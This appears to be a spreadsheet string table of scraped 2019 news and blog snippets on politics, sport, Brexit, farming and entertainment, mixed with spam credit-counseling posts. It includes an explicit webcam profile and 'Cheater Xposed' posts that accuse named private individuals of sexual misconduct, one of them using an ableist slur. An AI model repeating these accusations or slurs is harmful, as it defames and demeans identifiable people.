anything has changed. It appears that the Coalition is still a corporate front group. So…yeah, a “corporate front group” with a board of directors “dominated by corporate lawyers, many of whom defend companies from charges of foreign bribery,” has just said that Virginia’s ethics enforcement is so pathetically bad that it can’t even be rated. Is there irony in there? Or is it just pathetic? You decide. But the bottom line is we need major ethics reform in Virginia, including *of course* prohibiting state-“regulated” entities, and also corporations with business before the state, from donating money, lobbying, or in any way trying to influence legislation. Oh, and it should be illegal as well – with strong penalties for violations – for politicians and elected officials to accept money and/or meet with lobbyists from corporations with business before them. And, obviously, legislators should have to recuse themselves from voting on any issue where they could personally stand to gain, financially, by voting a particular way, including or excluding certain provisions in the legislation, etc. But today, sad to say, we are far, far from any of that, with folks like Senate Majority Leader Tommy Norment (R) and Senate Minority Leader Dick Saslaw (D) – also known as the tweedle dee and tweedle dum of the “we’re Virginia, we don’t need no stinkin’ ethics laws!” – crowd. For more on Saslaw’s Stone Age views on this topic, see, “In Crude Language, Sen. Dick Saslaw Argues that Ethics Laws are Irrelevant, Unnecessary.” Sweet, huh? It sure is for Dominion, Altria, Verizon, etc. – just not for the people or environment of Virginia. But who cares about them, anyway, right? (snark)</t>
  </si>
  <si>
    <t>NASA’S stunning portraits of the Ringed Giant Saturn reveal why the planet is often dubbed the Jewel of the Solar System. The post NASA news: Stunning portrait of Saturn reveals the Jewel of the Solar System’s rings appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>My Kinks: I have not the only fetish.. but mostlty Im excite Webcam profile: I am a very romantic girl, however I have a kinky mood very often:) You know what I mean:) I need a strong sexy man to be able to fulfill our desires) Favourite sex position: I love doggystyle and missionary) They are my two favourites:) What I do in my amateur show: I love hot and generous men,who knows how to excite a girl What I don’t like: Rude and arrogant men make me feel bad( Gallery</t>
  </si>
  <si>
    <t>Hurricane Dorian brought heavy rain and destructive floods to North Carolina as it continued up the east coast. North Carolina and Florida suffered at least four storm-related deaths. Photo:Associated Press</t>
  </si>
  <si>
    <t>Sunny ran off after getting zapped by an electric fence. See full article at Film-news.co.uk » The post Chris Hemsworth desperately searching for missing dog appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Disney+ may not launch in the UK until 2020 Original Source The excitement surrounding the launch of Disney+ has been palpable – well, that was until the UK found itself in the midst of the most drawn out launch date announcement in modern history. It is coming soon, we promise, but maybe not soon enough for many. A potential drop date for the highly anticipated streaming service has been revealed and it looks like the UK will have to wait until 2020 to get its Disney+ fix – that’s a long way from the November 12th rollout that the likes of the US is getting. Disney is yet to announce the reason behind the delay, however, many experts have pointed to potential licensing hurdles and issues relating to existing contracts with broadcasting giant Sky. “Across five European markets Disney and Sky are bound by large content deals—which apparently run into 2020—worth in the vicinity of $1 billion/year (£800m) when including Sky’s deal with Fox,” Tom Harrington, a senior research analyst at Enders Analysis, told Wired who was following up on a Film Stories report. These binding contracts include the various Disney channels available on Sky, alongside video-on-demand service Sky Cinema Disney. “Until the UK deal runs its course,” he notes, “Disney+ won’t launch in the UK, with the same for the other Sky territories.” When the service does eventually launch next year, Disney will become the consolidated home of Disney, Marvel, Pixar, National Geographic, Star Wars and selected Fox shows including The Simpsons. Disney+ will be available to stream via the official website, or via the dedicated app across a range of devices.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Disney+ may not launch in the UK until 2020 appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>There couldn’t have been more pressure on Canada’s Bianca Andreescu. With tennis legend Serena Williams mounting a memorable comeback in the second set and more than 23,000 fans inside Arthur Ashe Stadium going crazy, the Canadian teenager was feeling the pressure. It’s exactly where Andreescu wanted to be. CBC | Sports News</t>
  </si>
  <si>
    <t>Country avoids technical recession – but GDP is stagnant across three-month periodThe risks of the UK sliding into its first recession in a decade have receded after a stronger-than-expected and across-the-board 0.3% increase in activity in July.Data from the Office for National Statistics showed that after a dismal spring and early summer all sectors of the economy registered growth in the third quarter’s first month. Continue reading… Read More</t>
  </si>
  <si>
    <t>OrganicBiz</t>
  </si>
  <si>
    <t>By Glen Hallick MarketsFarm/OrganicBiz staff Not only has rain has delayed a good part of this year’s harvest on the Prairies, but for the most part prices for organic grains and oilseeds have remained flat. “It’s terrible everywhere, from Mexico to Nunavut,” quipped Jason Charles of Pipeline Foods in Minneapolis, Minn. regarding the wet conditions across the United States and Canada. “It just won’t stop raining. Wheat has been sitting, waiting to combine since August 25,” he said, noting that quality will now become an issue. “It’s hundreds of millions of dollars in loss.” Rain in the last few weeks has set most of the farmers in Manitoba back on harvest. – Laura Telford Charles quoted corn at US$8.00 per bushel and soybeans at US$19.00 per bushel, pretty much where they were in August. Laura Telford, organic sector development specialists with Manitoba Agriculture, concurred with Charles. “From what I heard the rain in the last few weeks has set most of the farmers in Manitoba back on harvest,” she said, noting that’s based on conversations with only a handful of them. Telford commented the Manitoba crop prior to the rain had been of average quality and prices were still weak. “I think most buyers have everything they need right now. Kind of waiting until after harvest to see if they can pick up some crops right off the combine,” she said. Jason Breault of RW Organics in Mossbank, Sask. said the harvest hasn’t reached the halfway point in his neck of the woods, about 70 kilometers south of Moose Jaw. Although Breault said he’s taking a wait-and-see approach to this year’s harvest, with the delays he expects prices to go down as the crops’ quality will have diminished. Presently RW Organics has offered C$13 per bushel for milling wheat and C$8.50 per bushel for feed wheat, he said. In Ontario, the soybean harvest was just getting underway said Andrew St. John, organic manager at Beechwood Agri Services in Parkhill. “It’s earlier than we expected due to the late planting. Things have caught up faster than we expected,” St. John commented. Wet conditions this spring caused delays for farmers trying to plant their crops. As for corn, he was excepting to see this year’s crop coming in by early November, which would be later than usual. He noted that the wheat harvest wrapped by the end of July. In speaking with some Ontario buyers and average prices per bushel were C$29.50 for soybean, C$11.90 for corn and wheat was about C$14.00. The post As rain delays 2019 Prairie harvest, organic prices remains flat appeared first on OrganicBiz.</t>
  </si>
  <si>
    <t>Roger Gonzalez</t>
  </si>
  <si>
    <t>The Best FIFA Football Awards final nominees were announced Monday in Milan, and three United States women’s national team members are up for honors, as well as other superstars like Lionel Messi and Cristiano Ronaldo. Megan Rapinoe and Alex Morgan are up for Best FIFA Women’s Player, while Messi, Ronaldo and Liverpool’s Virgil van Dijk are up for the men’s award. USWNT coach Jill Ellis, a two-time World Cup winner, is up for Best Women’s Coach as well. Voting will be by national team captains, coaches, fans and media and will be announced during The Best FIFA Football Awards ceremony in Milan on Monday, Sept. 23. Here’s a look at the nominees. The Best FIFA Men’s Player Cristiano Ronaldo — Portugal and Juventus Lionel Messi — Argentina and Barcelona Virgil van Dijk — Netherlands and Liverpool The Best FIFA Women’s</t>
  </si>
  <si>
    <t>My cat is constant support and a great friend to me. Her health is the most important thing for me and I make sure that she gets a regular checkup often. The previous Vet that I took my cat to for regular checkup has shut down due to some reason so I went to River City hospital because it is the closest one to my house. Spare your pet and yourself heartaches…..don’t trust them! They are insane about robbing money and are reckless about the pets. The staff is rude and ill-mannered and they aren’t straight forward with charges of the visit. I needed to get my cat rabies shot…when I called and conversed with one of the young ladies – I solicited what the expense from the visit would be. I was told $35. But after my visit, they charged me $126. I told the front work area young lady what I was told beforehand she told me that the extra amount was a test charge. She clarified that by State Law a test must be done. So WHY wasn’t I told about it when I initially booked my cat’s shot? I even confirmed later and I found out that there is no such law that insists on getting unnecessary tests done. I was in the examination room and felt that the room I was in was not cleaned properly. Each instrument, gadget, and thing that was used on my pet was utilized without gloves and the surface on the outside of the counter was full of some animal hair. I could hear the staff talking unpalatably behind the entryways and they were so noisy which is inappropriate for a hospital area. I paid over the top cost for the basic procedure which is so unfair because other vets don’t charge so much for such procedures. I realize this is not a human therapeutic office but with the huge price that you’re charging individuals, you could at least wipe the counters and cleanly store restorative apparatuses. The staff was somewhat disarranged and there were a few different individuals involved with my cat’s procedure. Having fewer people involved would be ideal particularly in circumstances where the pet is feeling uncomfortable. The vet who administered the shot was very insensitive and my cat was crying loudly and was in pain. I went back home and my cat starting experiencing horrible reactions of the shot. She was throwing up and was feeling unwell. She couldn’t sleep the whole night and be crying in pain continuously. I called them the other day and they told me that there is nothing wrong with their shot and it’s my cat that is having some serious illness. I consulted another vet and my cat is feeling much better now. If you care one bit about your pet don’t let them get destroyed by their hands. They are here in the business to make money and nothing else. Their hospital should close doors as soon as possible. 38632896www.vitalpet.com6050 St Johns Ave Palatka FL United StatesHospitals The post River City Veterinary Hospital – Expose Homewreckers appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>A teacher at a secondary school in Melbourne's south east has been suspended after being charged with child sexual assault and grooming offences.</t>
  </si>
  <si>
    <t>Joe Pepe</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</si>
  <si>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Personal Finance: Earning Money Through Rideshare Apps Is About to Get More Difficult by USA Consumer Credit Counseling, Felipe Escobar on Sunday 08 September 2019 09:24 AM UTC-05 Personal Finance Earning Money Through Rideshare Apps Is About to Get More Difficult Sunday 08 September 2019 07:56 AM UTC-05 Ask your Uber or Lyft driver why they like driving for a rideshare company, and you'll probably hear about its flexibility and convenience. The ease of ...</t>
  </si>
  <si>
    <t>Simone Fox Koob</t>
  </si>
  <si>
    <t>The boys, aged between 15 and 17, were arrested in a Commodore with stolen plates in Kew on Thursday night after allegedly robbing pedestrians in Clayton.</t>
  </si>
  <si>
    <t>Former US vice president Joe Biden has decried reports that President Donald Trump urged the president of Ukraine to look into his son's business dealings there.</t>
  </si>
  <si>
    <t>Source: https://www.cnet.com/news/ifa-2019-5g-laptops-streaming-news-and-more-at-europes-biggest-tech-show/#ftag=CAD590a51e IFA 2019: 5G, laptops, streaming news and more at Europe’s biggest tech show – CNET We’re on the ground in Berlin, Germany to bring you everything that matters from IFA 2019. Source: https://www.cnet.com/news/ifa-2019-5g-laptops-streaming-news-and-more-at-europes-biggest-tech-show/#ftag=CAD590a51e The post IFA 2019: 5G, laptops, streaming news and more at Europe’s biggest tech show – CNET appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Dylan Barnes, 20, accused Max Wiseman of trying to seduce his girlfriend, a court hears. The post Man who threatened to cut off friend’s penis jailed appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Steven Weber Jr. drowned after a romantic underwater proposal to his girlfriend during their trip to Tanzania this week.</t>
  </si>
  <si>
    <t>Senna Hamilton</t>
  </si>
  <si>
    <t>With 1,600 lighting projector’s shining down on the Marina Bay Street Circuit, Lewis Hamilton and Valtteri Bottas will both be in the spot light this weekend. With a few heavy braking zones, 23 corners, and a lack of straights – it is set to be a hard weekend ahead. The Marina Bay Circuit is one of the highest-duty races for the drivers this includes hard work for the breaks and changing gears 62 times. Hamilton completed 3,100 gear changes, while Bottas completed 4,140 during the 2018 Singapore Grand Prix. “We came back from the summer break knowing that the first two races would be difficult for us. We ended up with two double podiums and 67 points which was a strong form of damage limitation and more than we expected,” said Wolff. “The next race takes us to Singapore, a spectacular night race set and a great showcase for our sport. The offset schedule and the climate make it a demanding weekend for the team; temperatures in the garage can easily reach 40 degrees Celsius or more with high humidity levels as well. It’s a tough environment to work in and it’s equally challenging for the drivers and the car itself.” “For a long time, Singapore used to be one of our weakest tracks, but we’ve made some inroads into that and performed well last year. However, there are no home runs at a track like Singapore: we need to understand this car and this year’s tyres on a very particular track layout and take absolutely nothing for granted in our approach to the weekend,” he continued. “We are looking forward to a tough battle under the lights of Singapore,” Wolff said. With no team ever scoring a first and second place in Singapore, it not only showcases the struggles of the circuit but shows that there is a lot for Hamilton and Bottas to play for. Both drivers are at the top of the championship table, Singapore is set to be interesting.</t>
  </si>
  <si>
    <t>Most of the 268,000 pupils in years 2 to 9 who took the test will see their marks changed. Read more? Click here</t>
  </si>
  <si>
    <t>tightarse</t>
  </si>
  <si>
    <t>Been almost a year since last posted and a nice reminder for those unaware. Enjoy :) Turn a delay into a delight. Register your flight, and if it's delayed by two hours or more the drinks, nibbles and Wi-Fi are on us for you and four registered travelling companions, with access to a selection of airport lounges. Alternatively, if a lounge is unavailable, benefit from special dining offers at select cafes and restaurants*. Registration page here.</t>
  </si>
  <si>
    <t>Job Summary This Package Handler position requires the worker to physically contribute to the movement of packages within a fast-paced warehouse environment. In this general labour type of role, you will be responsible for loading, unloading, sorting, shipping, receiving, and stacking packages inside trailers. If assigned to the clerical work area of the warehouse you .. Read more</t>
  </si>
  <si>
    <t>Melissa Mackay</t>
  </si>
  <si>
    <t>In a remote community where fighting and rioting have divided residents, an unlikely football team has changed everything in just one season.</t>
  </si>
  <si>
    <t>Harry Slade</t>
  </si>
  <si>
    <t>McLaren F1 Team’s Carlos Sainz Jr. has admitted his disappointment at his third non-score in a row in the FIA Formula 1 World Championship at last weekend’s Singapore Grand Prix following costly contact with former team-mate Nico Hülkenberg on the opening lap at the Marina Bay Street Circuit. The Spaniard qualified a superb seventh for the Woking-based outfit to deny their engine manufactures Renault F1 Team the spoils in Formula 1’s hotly contested midfield battle. However, his German adversary aimed to bounce back on race day and duly attempted an ambitious lunge on Sainz – dropping both to the rear of the field. Unluckily for Sainz, he dropped a lap behind the leaders, ultimately leaving him firmly out of contention for points. That was until a string of late-race safety cars brought him back onto the lead lap, and onto the tail end of the field. From there Sainz delivered his typical combative drive, only to end his quest for points in twelfth, just behind the Haas F1 driver of Romain Grosjean. On the incident itself the Spaniard was clear in his disappointment stating , “Very disappointing end to the weekend. For the second time in a row we end up with a non-points finish when we were up for a good result. We had the start that we wanted; we were P7 attacking the Red Bull in front of us. However, into Turn Five, I got hit from behind by the Renault and that was it. We had a puncture, big car damage, a long pit-stop and I was one lap down. It’s a shame because it would’ve been a good P7 and a double-points finish for the team, “he continued. Sainz Jr. did take the positives, stressing that he fought hard to regain a place in the points following a disappointing opening lap, as he “felt strong” under the floodlights. “Nonetheless, we didn’t give up and fought hard until the end. I felt strong physically and mentally in the car,” said Sainz. He also expressed his confidence that he will bounce back on Sunday in Sochi as the Formula 1 fraternity heads to the Sochi Olympic park for round sixteen of the 2019 season. He stated,” I’m sure we can fight back in Russia. Let’s put this race behind for now and focus on next weekend.”</t>
  </si>
  <si>
    <t>Cooper Cronk has paid homage to a former Melbourne Storm teammate as he prepares to close out his career with the Roosters in Sunday's NRL grand final.</t>
  </si>
  <si>
    <t>Ensure that you are restarting your cell phone occasionally. This will clear memory caches that are being filled by apps such as Twitter or Facebook. It should function much better as a result. TIP! Restart your phone periodically to purge the memory of programs like Facebook and Twitter. When this is done every couple of days, your phone will work at its peak performance level more consistently. There are lots of things you may not know about cellphones, and you’re not the only one. There are so very many options that it’s difficult to know how to find a good cell phone and then how to optimize it. Here are some great tips for you to get started. Remember that age will slow down a smartphone. It is true that downloading updates to the software can help prevent these phones from becoming obsolete. Most new phones have updates that are more powerful. That means your old phone might not be able to handle them. TIP! Smartphones will slow down with age. If you update your software, it can help to keep the phone running. Be careful not to watch too much video while using your cell phone out of wi-fi range. You will usually be restricted to a certain amount of data. Video tends to use that allowed data quickly, and you might wind up with an unexpected expense. If overages are a common occurrence for you, then you need to rethink your plan. If you own a smartphone, you probably use it fairly consistently throughout the day. Power your phone off on a regular basis. Smartphones are just like computers. Rebooting them often helps keep them running at top efficiency. Even by shutting it off a couple times a week, you may notice a difference. TIP! If you are like most smartphone users, you probably use your phone almost constantly. You should not leave it on for 24 hours a day, 7 days a week. You need not be the first on your block to have the newest phone. Sometimes this isn’t worth the trouble. Though many providers make consistent changes, they usually are not big ones. Be sure to read reviews before buying anything. Most of time, you won’t need to. Smartphones become slower with time. As time passes, simple things like updating apps could become cumbersome. In many cases, making a choice becomes necessary. You can keep the status quo, and refuse any new updates, or upgrade your phone to a newer version. TIP! Cell phones run slower with time. Over time, simple things like updating apps may become cumbersome. It’s likely that your cell phone is used multiple times daily. But, you should turn your phone off once in awhile. Smart phones are similar to computers. Restarting them can free up the memory and keep them running better. You should see a major difference with your phone if you turn it off occasionally. When buying a newer cellphone, take time to compare phones in actual physical stores. Shopping in person, will allow you to hold multiple cell phones to see if they are comfortable to hold and to test out any unfamiliar new features they may have. That way, you’ll better your chances of getting a phone that you’ll enjoy. TIP! When you need to get a cell phone, take the time to visit an actual store. Invest a few hours in actually holding various models and testing their features. Is your battery life too short? It could be because of a weak signal if that’s the case. A poor signal can actually drain your battery. Never leave your phone somewhere where it has poor reception. Don’t buy a smartphone if you’re just getting a cell phone to talk to others. Everyone has one, but most people are paying for features they may not need. Smartphones cost more than basic phones, so look for something more standard if you only need a phone for talking. TIP! If you only require a cell phone for voice communications, do not buy a smartphone. Everyone has smartphones these days; however, but m any use the functionality to browse the web and send emails rather than talk. When purchasing a brand new cell phone, be sure to take time and do your research. Invest time in looking at different models and remember to test their features. By doing this, you will probably find the best phone for you, much easier. Cases may not be required for the very latest phone models. The bodies of modern phones such as the smartphone already have very strong material such as Kevlar and carbon fiber incorporated. While you can make a phone stronger with certain cases, it can be a lot harder to use the phone you have. Analyze your choices, and select a phone based on what you need. Cell Phones Spice up your life by using your phone to play games during the day. Smartphones can stream great graphics, so you are able to play many great games on them. Avoid game overload on your cell phone. You can have a negative impact on your memory if you don’t. There is a lot to understand about cell phones. Technology can be difficult to understand sometimes. This article helped to clarify the more rudimentary concepts regarding cell phones. Take the time to learn about the applications that come with your phone. Most phones these days allow you to surf the web and listen to music. You can also access a calendar function on many of them. Learning to use all these programs is going to maximize your investment. Blue widgets can be a complicated subject if you don’t know where to start. It is important to make sure that you have the proper knowledge to move forward. Use the guidance, advice and tips in this piece in order to succeed.</t>
  </si>
  <si>
    <t>The 50-year-old actor and his ex-partner Kate Beckinsale share 20-year-old daughter Lily Sheen. See full article at Film-news.co.uk » The post Michael Sheen: 'Fatherhood will be easier second time around' appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Part of a walkway collapsed in the Iraqi city of Karbala as tens of thousands of people celebrated Ashoura, causing a stampede and killing at least 31 pilgrims.</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</si>
  <si>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San Leandro, California Consumer Credit Counseling Service | (888) 551-1270 by USA Consumer Credit Counseling, Felipe Escobar on Monday 02 September 2019 12:59 PM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San Leandro, California Consumer Credit Counseling Service | (888) 551-1270 Monday 02 September 2019 12:21 PM UTC-05 | Tags: california-consumer-credit-counseling-service-888-551-1270 san-leandro https://youtu.be/CnDLCVlbbmY San Leandro, California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San Leandro, California credit counseling services provide resources to help solve your money problems. Counselors discuss your entire financial situation and help you develop a personalized plan. They can assist you with starting a budget. And they can help you find educational programs on money management. Debt Collection A debt collector generally is a person or company that regularly collects debts owed to others, usually when those debts are past-due. This includes collection agencies, lawyers who collect debts as part of their business, and companies that buy delinquent debts and then try to collect them. The Fair Debt Collection Practices Act (FDCPA) prohibits debt collectors from using abusive, unfair, or deceptive practices to collect from you. The Servicemembers Civil Relief Act (SCRA) assists active-duty military with financial burdens. Under this act, you may qualify for a reduced interest rate on mortgages and credit card debts. It can offer protection from eviction. It can also delay civil court including bankruptcy, foreclosure, or divorce proceedings. To find out if you qualify, contact San Leandro, California Consumer Credit Counseling Service (888) 551-1270. While there is no universal program to help with personal debt, there are a number of local programs to help people in financial hardships. One of the main sources of financial hardship is due to illness and medical bills. Not only do people lose income, but medical debt can be very expensive. Left with no recourse, many people use up their savings and even run up credit card debt to pay medical bills and get medical care. Contact San Leandro, California Consumer Credit Counseling Service at (888) 551-1270 to learn about the many government sponsored programs available to help you get out of debt. http://www.tunesbaby.com/yt/?x=CnDLCVlbbmY https://endlessvideo.com/watch?v=CnDLCVlbbmY https://consumercreditcounselingserviceusa.blogspot.com/p/passaic-new-jersey-consumer-credit_22.html http://creditcounselingconsumer.home.blog/peoria-illinois-consumer-credit-counseling-service-888-551-1270-2/ http://californiacreditcounseling.video.blog/garland-texas-consumer-credit-counseling-service-888-551-1270/ http://districtofcolumbiacreditcounseling.home.blog/st-george-utah-consumer-credit-counseling-service-888-551-1270/ via San Leandro, California Consumer Credit Counseling Service | (888) 551-1270 September 02, 2019 at 12:08PM Copyright © September 02, 2019 at 12:08PM Tags: california-consumer-credit-counseling-service-888-551-1270 san-leandro</t>
  </si>
  <si>
    <t>Louis Doré</t>
  </si>
  <si>
    <t>Prime Minister Boris Johnson has been told to “come up with a plan B” with regards to Brexit, by David Lidington, a former cabinet minister under Theresa May. Mr Lidington told BBC Radio 4’s Today programme that he would set a “dangerous precedent” if he ignored an incoming law compelling him to seek an Article 50 deadline extension from Brussels if no agreement is in place by 19 October. The proposed law is expected to receive royal assent on Monday. “I understand why the PM is opposed to this [Brexit delay],” Mr Lidington said. “Having talked to him – it is no secret I have differences with him on European policy – I was persuaded that he was serious about getting a deal. “He basically said to me, please give me until the European Council to really get in there and negotiate that deal and come back to Parliament. My decision was I would give him that opportunity to get that deal. “It is such a fundamental principle that we are governed by the rule of law that I hope no party would question it. Read more: Johnson tells Tory members he will break the law rather than extend Article 50 “Defying any particular law sets a really dangerous precedent.” Mr Johnson wrote to Tory members on Friday evening, telling them: “They just passed a law that would force me to beg Brussels for an extension to the Brexit deadline. This is something I will never do.” He also told reporters asking whether he would write to EU leaders for more time: “I will not. I don’t want a delay.” Direct Rule? Former Cabinet member David Lidington (Photo: AFP/Getty Images) Read more: True Blue Tories in swing seat Richmond turned off by the Brexit purge Mr Lidington also suggested on the show that Northern Ireland would require “some kind of direct rule” ahead of Brexit. He said: “There will have to be some kind of direct rule and, I think, it’s important that the Government gets that sorted and in place, before the end of October, that deadline. “At the moment, the Northern Ireland civil service has no power to do things like give emergency support to farmers or food producers whose supply chains into the Irish Republic could be completely killed by a no-deal exit. “All of a sudden their customers south of the border would say: ‘Sorry you haven’t got the certification. It’s no longer an EU product, I can’t legally buy this from you anymore’. “The civil service of Northern Ireland does not have any power to help in those circumstances or to take other emergency measures that would be needed in the event of no deal. “I think it would be unconscionable to leave any part of the United Kingdom without proper governance in the circumstances of that kind of crisis and for Northern Ireland, in particular, where the politics is fragile, the case is stronger than anywhere else to get this sorted in advance.” Northern Ireland’s parliament, based at Stormont, has been without an executive for more than two years and during that time Parliament has had to pass some key legislation for Northern Ireland. EU collaboration with ‘Rebel Alliance’ Read more: Boris Johnson ‘held hostage’ as Jeremy Corbyn and all opposition leaders unite Senior MPs who opposed a no-deal Brexit sought out assurances from the EU that their proposed three-month delay would be granted, it was revealed on Saturday. The Guardian reports that European leaders were contacted by MPs in the so-called ‘Rebel Alliance‘ before the bill was passed. The bill compels Boris Johnson to ask for an extension should a deal not be in place by 19 October, postponing the deadline until the end of January 2020. Opposition parties have agreed to block a general election until a Brexit extension has been agreed. More Brexit: Brexit deadline forces farmers to look at Africa but there are catches Johnson tells Tory members he will break law over Article 50 extension Two in five firms are not prepared for the impact a no deal Brexit Sir Nicholas Soames calls Jacob Rees-Mogg an 'absolute fraud' Boris Johnson 'held hostage' as Corbyn and opposition leaders unite That was the week that was: Boris Johnson losing week The post Boris Johnson told to ‘come up with a Plan B’ and warned of ‘dangerous precedent’ by David Lidington appeared first on inews.co.uk. The post Boris Johnson told to ‘come up with a Plan B’ and warned of ‘dangerous precedent’ by David Lidington appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Mother-of-two Suzanne Poll was stabbed to death at her work in Salisbury in 1993 and the case had remained unsolved.</t>
  </si>
  <si>
    <t>michelleschriver</t>
  </si>
  <si>
    <t>These mortgages are expected to have different default probabilities relative to traditional mortgages The post OSFI sets out capital rules for first-time homebuyer mortgages appeared first on Advisor.</t>
  </si>
  <si>
    <t>Craig Butt</t>
  </si>
  <si>
    <t>Share your journey, news tips, interesting pictures, video and comments with other Melbourne Express readers via craig.butt@theage.com.au, Twitter or Facebook.</t>
  </si>
  <si>
    <t>11th State Senate District Democratic nominee Amanda Pohl correctly calls out Sen. Amanda Chase (R)’s “rhetoric and threats towards those you disagree with” as “disturbing” “extremism.” To donate to Amanda Pohl’s campaign, click here. And for more information on Chase, see Audio: Sen. Amanda Chase (R) Says “I Wish [NRA] Would Write *Me* a Check for $200,000”, Right-Wing Republican Virginia State Senator Amanda Chase: “It’s those who are naive and unprepared that end up raped”, “I Call My Revolver My Little Equal Rights Amendment”; State Senator Amanda Chase (R-11th) Claims Capitol Police Are Partisan Liars; Far-Right, Pistol-Packing Virginia State Sen. Amanda Chase Praises “Make Bang Bang” Gun Guy’s “great group who believe in our constitution and rights as Americans.” and Far-Right Virginia Sen. Amanda Chase: “The ERA Amendment is nothing more than a ploy by the left to eliminate gender altogether.”</t>
  </si>
  <si>
    <t>Halfback is one of the few positions where Michael Cheika has genuine world-beaters at his disposal - and Nic White is the man who can give the Wallabies the edge.</t>
  </si>
  <si>
    <t>Victoria Police confirmed it was the second incident of a pin hidden inside a strawberry reported to them in the space of a month.</t>
  </si>
  <si>
    <t>Priyanka Chopra and singer Nick Jonas tied the knot last December. See full article at Film-news.co.uk » The post Priyanka Chopra: 'Starting a family is on my to-do list' appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Ukraine's president is coming under increasing pressure to reveal what was said during a much-reported phone call with President Trump.</t>
  </si>
  <si>
    <t>editor</t>
  </si>
  <si>
    <t>Sept. 20, 2019 Israel’s Gantz Would Likely Maintain Netanyahu’s Foreign-Policy Stance – Felicia Schwartz If he becomes Israel’s next leader, retired Gen. Benny Gantz, 60, would likely follow the same path as Prime Minister Benjamin Netanyahu. Gantz served as the head of Israel’s military from 2011 to 2015, while Netanyahu was the prime minister. President Trump has described Gantz as a good person and said Wednesday that the U.S. relationship is with Israel, not any one leader. Gantz has said he thought the Obama administration could have reached a better nuclear deal with Iran in 2015. He has wholeheartedly supported Netanyahu’s campaign against Iran, as Israel has launched strikes against Tehran’s positions and those of its allies in Syria, Iraq and Lebanon. “I am standing shoulder-to-shoulder with Prime Minister Netanyahu in the fight against Iran’s aggression,” Gantz told the Munich Security Conference earlier this year. Gantz has said he would put any Israeli withdrawal from the West Bank up for a public vote and would look to take unilateral steps if a peace deal can’t be reached. “If it turns out that there is no way to reach peace at this time, we will shape a new reality,” he said. After Netanyahu pledged to apply Israeli sovereignty to the Jordan Valley, Gantz called the area “a part of Israel forever.” Many Israelis, including Gantz, consider that area on the Jordan border essential to Israel’s security. (Wall Street Journal)</t>
  </si>
  <si>
    <t>AMANDA HOLDEN, 48, and Alesha Dixon, 40, showed off their impressive style as they stepped out for Britain’s Got Talent: The Champions. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>There are fears of escalating tensions in the region as Iran is blamed for strikes on oil facilities. The post Saudi oil attacks: Nato chief ‘extremely concerned’ about escalation appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/9/20/20868532/untitled-goose-game-review-nintendo-switch-pc-house-panic Untitled Goose Game is a honkin’ good time House House The idea for Untitled Goose Game was hatched when developer Michael McMaster dropped a stock photo of a goose into Slack and half-jokingly said, “Let’s make a game about this.” And the four-person indie studio House House absolutely followed through on a stellar concept, because Untitled Goose Game is exactly as delightful as you’d expect a game about being a lawless goose on the loose to be. The game’s premise is simple: you are a goose, and it’s your mission to make life mildly harder for the world’s most patient villagers, who somehow never resort to violence. You’re given a to-do list to fulfill, and items get crossed out one by one as you complete the tasks from your depraved goose agenda. Some of the challenges are straightforward… Continue reading… Source: https://www.theverge.com/2019/9/20/20868532/untitled-goose-game-review-nintendo-switch-pc-house-panic The post Untitled Goose Game is a honkin’ good time appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Tarnished golden boy still knows how to have a good dig at his own expense.</t>
  </si>
  <si>
    <t>Kissing cousins is as old as the hills, Jerry Lee played piano for his cousin and eventually married her familiar face. Meng Lee likes his cousin and kisses on Yuna when ever he can, they’re just keeping things in the family, which seems to be a rather hot, if not taboo, subject in the latest of p**n fetishes. Moms and sons, dads and daughters, insest with family members. Meng is just hip to the latest in nasty p**n and wants to express himself with Yuna. Is that really cheating or just begging for retarded children? The post Meng Lee — Saint Paul, Minnesota appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Power Saver</t>
  </si>
  <si>
    <t>You are viewing the GEBIH71-2 EDGESTRIP HO 7100K – Tetra 93011560 from the GE Tetra range. This module is perfect for use in single or double side signs, Tetra EdgeStrip delivers money saving advantages over T8 fluorescent tubes while producing an outstanding visual performance. Using the OptiLens technology from GE which maximises LED performance by capturing wasted light and redirecting towards the illuminated surface. EdgeStrip can tightly follow the contour of the signs frame to distribute light to every inch of the face. These EdgeStrip Modules are IP68 rated for exposed applications and wet weather outdoor use with its robust design to protect against moisture, dust and damage. Easy installation with pre drilled mounting holes and the ability to cut between any modules to give customers extra peace of mind and free reign with the products. EdgeStrip modules have a long rated life of 50,000 hours and come complete with a 5-year warranty. 32 modules per sleeve Manufacturers Part No (where applicable) : GEBIH71-2 This GE Tetra product is available for just £10.42 at LampShopOnline Ltd</t>
  </si>
  <si>
    <t>Toronto Blue Jays (55-88, fourth in the AL East) vs. Tampa Bay Rays (85-59, second in the AL East)</t>
  </si>
  <si>
    <t>Workers on zero hours contracts will find it easier to get onto or move up the property ladder in future, says HSBC UK which is tweaking interest rates on its mortgage range with cuts of up to 0.35 percent. Following a review of the documents required to support mortgage and remortgage applications and feedback from mortgage brokers and customers, the bank is relaxing certain conditions. Daily Express :: City and Business Feed</t>
  </si>
  <si>
    <t>Rafael Nadal stepped in late in the first set to lend advice to Roger Federer during his Laver Cup clash with John Isner. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>The Spaniard signing a new 4-year contract is the best piece of business the Old Trafford club have done this summer Source: Sports Business News</t>
  </si>
  <si>
    <t>A Dundee-based support group for endometriosis sufferers is aiming to tackle the isolation those living with the condition can be faced with.</t>
  </si>
  <si>
    <t>Greg Davis</t>
  </si>
  <si>
    <t>OPP allege the vehicle was travelling more than 62 km/h over the posted speed limit.</t>
  </si>
  <si>
    <t>Wall Street stock futures edged up in early trade on Monday, setting an upbeat tone for Asian markets on hopes of an interim Sino-U.S. tariff deal after the U.S. Trade Representative characterized their two days of talks as "productive".</t>
  </si>
  <si>
